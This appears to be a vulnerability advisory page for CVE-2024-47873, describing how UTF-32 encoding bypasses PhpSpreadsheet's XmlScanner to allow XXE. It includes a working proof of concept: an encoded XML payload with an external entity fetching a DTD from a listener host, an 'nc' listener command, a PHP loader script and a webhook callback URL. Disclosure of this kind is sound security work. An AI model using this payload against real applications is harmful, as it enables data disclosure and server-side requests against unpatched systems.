CVE-2024-47873
HIGH7.5EPSS 0.17%XmlScanner bypass leads to XXE
描述
### Summary The [XmlScanner class](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a [scan](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) method which should prevent XXE attacks. However, the regexes used in the `scan` method and the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method can be bypassed by using UCS-4 and encoding guessing as described in <https://www.w3.org/TR/xml/#sec-guessing-no-ext-info>. ### Details The `scan` method converts the input in the UTF-8 encoding if it is not already in the UTF-8 encoding with the [`toUtf8` method](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L76). Then, the `scan` method uses a [regex](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L79) which would also work with 16-bit encoding. However, the regexes from the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method, which is used for determining the current encoding can be bypassed by using an encoding which has more than 8 bits, since the regex does not expect null bytes, and the XML library will also autodetect the encoding as described in <https://www.w3.org/TR/xml/#sec-guessing-no-ext-info>. A payload for the `workbook.xml` file can for example be created with [CyberChef](https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-32BE%20(12001)')&input=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPCFET0NUWVBFIG1lc3NhZ2UgWwogICAgPCFFTlRJVFkgJSBleHQgU1lTVEVNICJodHRwOi8vMTI3LjAuMC4xOjEyMzQ1L2V4dC5kdGQiPgogICAgJWV4dDsKXT4KPHdvcmtib29rIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvc3ByZWFkc2hlZXRtbC8yMDA2L21haW4iIHhtbG5zOnI9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMiPjxmaWxlVmVyc2lvbiBhcHBOYW1lPSJDYWxjIi8%2BPHdvcmtib29rUHIgYmFja3VwRmlsZT0iZmFsc2UiIHNob3dPYmplY3RzPSJhbGwiIGRhdGUxOTA0PSJmYWxzZSIvPjx3b3JrYm9va1Byb3RlY3Rpb24vPjxib29rVmlld3M%2BPHdvcmtib29rVmlldyBzaG93SG9yaXpvbnRhbFNjcm9sbD0idHJ1ZSIgc2hvd1ZlcnRpY2FsU2Nyb2xsPSJ0cnVlIiBzaG93U2hlZXRUYWJzPSJ0cnVlIiB4V2luZG93PSIwIiB5V2luZG93PSIwIiB3aW5kb3dXaWR0aD0iMTYzODQiIHdpbmRvd0hlaWdodD0iODE5MiIgdGFiUmF0aW89IjUwMCIgZmlyc3RTaGVldD0iMCIgYWN0aXZlVGFiPSIwIi8%2BPC9ib29rVmlld3M%2BPHNoZWV0cz48c2hlZXQgbmFtZT0iU2hlZXQxIiBzaGVldElkPSIxIiBzdGF0ZT0idmlzaWJsZSIgcjppZD0icklkMiIvPjwvc2hlZXRzPjxjYWxjUHIgaXRlcmF0ZUNvdW50PSIxMDAiIHJlZk1vZGU9IkExIiBpdGVyYXRlPSJmYWxzZSIgaXRlcmF0ZURlbHRhPSIwLjAwMSIvPjxleHRMc3Q%2BPGV4dCB4bWxuczpsb2V4dD0iaHR0cDovL3NjaGVtYXMubGlicmVvZmZpY2Uub3JnLyIgdXJpPSJ7NzYyNkM4NjItMkExMy0xMUU1LUIzNDUtRkVGRjgxOUNEQzlGfSI%2BPGxvZXh0OmV4dENhbGNQciBzdHJpbmdSZWZTeW50YXg9IkNhbGNBMSIvPjwvZXh0PjwvZXh0THN0Pjwvd29ya2Jvb2s%2B.). If you open an Excel file containing the payload from the link above stored in the `workbook.xml` file with PhpSpreadsheet, you will receive an HTTP request on `127.0.0.1:12345`. You can test that an HTTP request is created by running the `nc -nlvp 12345` command before opening the file containing the payload with PhpSpreadsheet. ### PoC - Create a new folder. - Run the `composer require phpoffice/phpspreadsheet` command in the new folder. - Create an `index.php` file in that folder with the following content: ```PHP <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Xlsx; $spreadsheet = new Spreadsheet(); $inputFileType = 'Xlsx'; $inputFileName = './payload.xlsx'; /** Create a new Reader of the type defined in $inputFileType **/ $reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType); /** Advise the Reader that we only want to load cell data **/ $reader->setReadDataOnly(true); $worksheetData = $reader->listWorksheetInfo($inputFileName); foreach ($worksheetData as $worksheet) { $sheetName = $worksheet['worksheetName']; echo "<h4>$sheetName</h4>"; /** Load $inputFileName to a Spreadsheet Object **/ $reader->setLoadSheetsOnly($sheetName); $spreadsheet = $reader->load($inputFileName); $worksheet = $spreadsheet->getActiveSheet(); print_r($worksheet->toArray()); } ``` - Run the following command: `php -S 127.0.0.1:8080` - Add the [payload.xlsx](https://github.com/user-attachments/files/17334157/payload.xlsx) file, which contains a payload similar to the payload from the details section, but with the URL `https://webhook.site/65744200-63d2-43a2-a6a0-cca8d6b0d50a` instead of the `http://127.0.0.1:12345/ext.dtd` URL, in the folder and open <https://127.0.0.1:8080> in a browser. You will see an HTTP request on <https://webhook.site/#!/view/65744200-63d2-43a2-a6a0-cca8d6b0d50a>. ### Impact An attacker can bypass the sanitizer and achieve an [XXE attack](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).
受影響套件(2)
- Packagist/phpoffice/phpexcelfrom 0, <= 1.8.2
- Packagist/phpoffice/phpspreadsheetfrom 0, < 1.29.4
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH7.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
參考連結(6)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2024-47873
- PATCHhttps://github.com/PHPOffice/PhpSpreadsheet
- WEBhttps://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php
- WEBhttps://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-jw4x-v69f-hh5w
- WEBhttps://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
- WEBhttps://www.w3.org/TR/xml/#sec-guessing-no-ext-info